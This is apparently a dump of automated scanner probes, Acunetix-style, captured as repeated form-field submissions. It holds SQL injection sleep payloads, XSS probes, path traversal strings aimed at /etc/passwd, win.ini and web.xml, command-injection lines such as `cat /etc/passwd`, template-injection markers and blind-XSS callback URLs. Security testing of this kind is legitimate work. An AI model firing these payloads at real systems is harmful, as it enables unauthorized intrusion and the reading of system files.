(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

`cat /etc/passwd`

1<img/src=">" onerror=alert(969987)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

-1

1<ScRiPt%20>prompt(917711)</sCripT>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

1

)

1&n933531=v940941

1some_inexistent_file_with_long_name%00.jpg

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

\xf6<img acu onmouseover=prompt(998519) //\xf6>

/etc/passwd

'"()

1

1

testasp.vulnweb.com

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(996778)>

^(#$!@#$)(()))******

0QUnKWDD'

'

1

1

1

'

<a href='http://www.acunetix.com'>website security</a>

1

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

xfvbI4YV')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

1_c5CwT <ScRiPt >prompt(951032)</ScRiPt>

||cat /etc/passwd

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

ZAp2xhjw'))

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitSPKtgGTBXo.bxss.me/

1

&dir

1

1

1

comments

1

-1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

-1)

'"

1

file:///etc/passwd

http://www.acunetix.tst

1

1

-1))

1

"&dir&"

comments/.

Vzv0S78o'

/\../\../\../\../\../\../\../etc/passwd

<!--

1'"()&%<ScRiPt >prompt(991898)</ScRiPt>

1

1

1

|dir

o7T2q1yd')

1

'"()&%<ScRiPt >prompt(936731)</ScRiPt>

1

WEB-INF/web.xml

1

'|dir

1

WG361nEO'))

1

1

1_957391

1

"|dir

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu3602\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3602

../../../../../../../../../../windows/win.ini.jpg

1

acux3527\xc0\xbez1\xc0\xbcz2a\x90bcxuca3527

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(988790)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(922548)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(924115)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990177></ScRiPt>

1

1

1<ScRiPt >prompt(945559)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9471390*9685782)

1<video><source onerror="javascript:prompt(934720)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9471390*9685782)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907748)"></g></svg>

1

1

"+response.write(9471390*9685782)+"

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(978584))>

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

WEB-INF\web.xml

1

${100108+100040}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

'&cat /etc/passwd&'

1

1

1<body onload=prompt(966173)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948971)>

"&cat /etc/passwd&"

1

1&n913206=v938272

1some_inexistent_file_with_long_name%00.jpg

)

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(994004)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

!(()&&!|*|*|

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

`cat /etc/passwd`

1<img/src=">" onerror=alert(950883)>

1

^(#$!@#$)(()))******

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'"()

|cat /etc/passwd#

testasp.vulnweb.com

1

1

1

-1))

1

1<ScRiPt%20>prompt(942237)</sCripT>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1&lt

O9Fny7YH'

'

1

1

\xf6<img acu onmouseover=prompt(964652) //\xf6>

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

"

pRxT3reu')

1

1

1<input autofocus onfocus=prompt(996870)>

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

'

oJ9PTmke'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hityFjXAbQkHE.bxss.me/

<a href='http://www.acunetix.com'>website security</a>

"

comments

1

${@print(md5(acunetix_wvs_security_test))}\

-1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1)

1

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1_Okw8Z <ScRiPt >prompt(901209)</ScRiPt>

http://www.acunetix.tst

-1))

1

comments/.

1

1

1

<!--

fjRssfSs'

1

1

1'"()&%<ScRiPt >prompt(915206)</ScRiPt>

1

1

&dir

1

1

file:///etc/passwd

1

'&dir&'

'"()&%<ScRiPt >prompt(965453)</ScRiPt>

1

1

r8WKrjPD')

1

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1_920141

1

0eJuylWW'))

1

WEB-INF/web.xml

1

|dir

1

1

'|dir

WEB-INF\web.xml

1

1

acu9764\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9764

../../../../../../../../../../windows/win.ini

"|dir

1

acux4690\xc0\xbez1\xc0\xbcz2a\x90bcxuca4690

1

1<ScRiPt >prompt(960700)</ScRiPt>

../../../../../../../../../../boot.ini

1

1<script>prompt(969608)</script>

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(902733)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934940></ScRiPt>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(983296)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

response.write(9101523*9274712)

1<video><source onerror="javascript:prompt(997167)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(900683)"></g></svg>

'+response.write(9101523*9274712)+'

1

1

1

1<div style=width:expression(prompt(951714))>

"+response.write(9101523*9274712)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../etc/passwd

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'&cat /etc/passwd&'

1

1<body onload=prompt(922408)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958573)>

${100048+99113}

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

cat /etc/passwd

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<img src=xyz OnErRor=prompt(963991)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF\web.xml

`cat /etc/passwd`

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<img/src=">" onerror=alert(997233)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt%20>prompt(973900)</sCripT>

1&n981435=v938234

1

1

)

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

-1)

'|'ld

!(()&&!|*|*|

1

1

'"()

1

/etc/passwd

\xf6<img acu onmouseover=prompt(908199) //\xf6>

1

1

^(#$!@#$)(()))******

"|"ld

1

-1))

1<input autofocus onfocus=prompt(949983)>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

<a href='http://www.acunetix.com'>website security</a>

273Q5UHY'

1

'

1

1

1

"

bW0KV9Hk')

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

"

1

1

${@print(md5(acunetix_wvs_security_test))}\

W2mHGVjO'))

1

1_fl9M1 <ScRiPt >prompt(919826)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://hitE0fsOCPaj4.bxss.me/

1

1

1

||cat /etc/passwd

1

-1

1

1

1

1

acunetix_wvs_invalid_filename

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

-1)

1

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

comments

WEB-INF/web.xml

'"

'&dir&'

1

1

-1))

1

comments

1'"()&%<ScRiPt >prompt(968578)</ScRiPt>

<!--

AAam4jDU'

1

1

WEB-INF\web.xml

"&dir&"

'"()&%<ScRiPt >prompt(930475)</ScRiPt>

1

comments/.

1

mVTgxzrY')

../../../../../../../../../../windows/win.ini

|dir

1

1_997514

1

KoWeF6cs'))

1

../../../../../../../../../../boot.ini

1

'|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

acu6451\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6451

1

1

acux3388\xc0\xbez1\xc0\xbcz2a\x90bcxuca3388

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(930571)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(969064)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(995643)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?949226></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(919805)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(984170)">

1

1

response.write(9324238*9616830)

WEB-INF/web.xml

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(937510)"></g></svg>

WEB-INF\web.xml

'+response.write(9324238*9616830)+'

1

1

1<div style=width:expression(prompt(958758))>

&cat /etc/passwd&

1

"+response.write(9324238*9616830)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(908978)>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

if(now()=sysdate(),sleep(10.125),0)/*'XOR(if(now()=sysdate(),sleep(10.125),0))OR'"XOR(if(now()=sysdate(),sleep(10.125),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988164)>

1

1

1

1

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(979002)>

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99850+99658}

(select(0)from(select(sleep(3.375)))v)/*'+(select(0)from(select(sleep(3.375)))v)+'"+(select(0)from(select(sleep(3.375)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(978371)>

`cat /etc/passwd`

1

1

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1

1<ScRiPt%20>prompt(994269)</sCripT>

-1)

1&n916366=v947032

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

testasp.vulnweb.com

-1))

1&lt

1

'|'ld

1

1

HQV2slG4'

1

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

kbmQBpFU')

"|"ld

\xf6<img acu onmouseover=prompt(986601) //\xf6>

/etc/passwd

1

^(#$!@#$)(()))******

1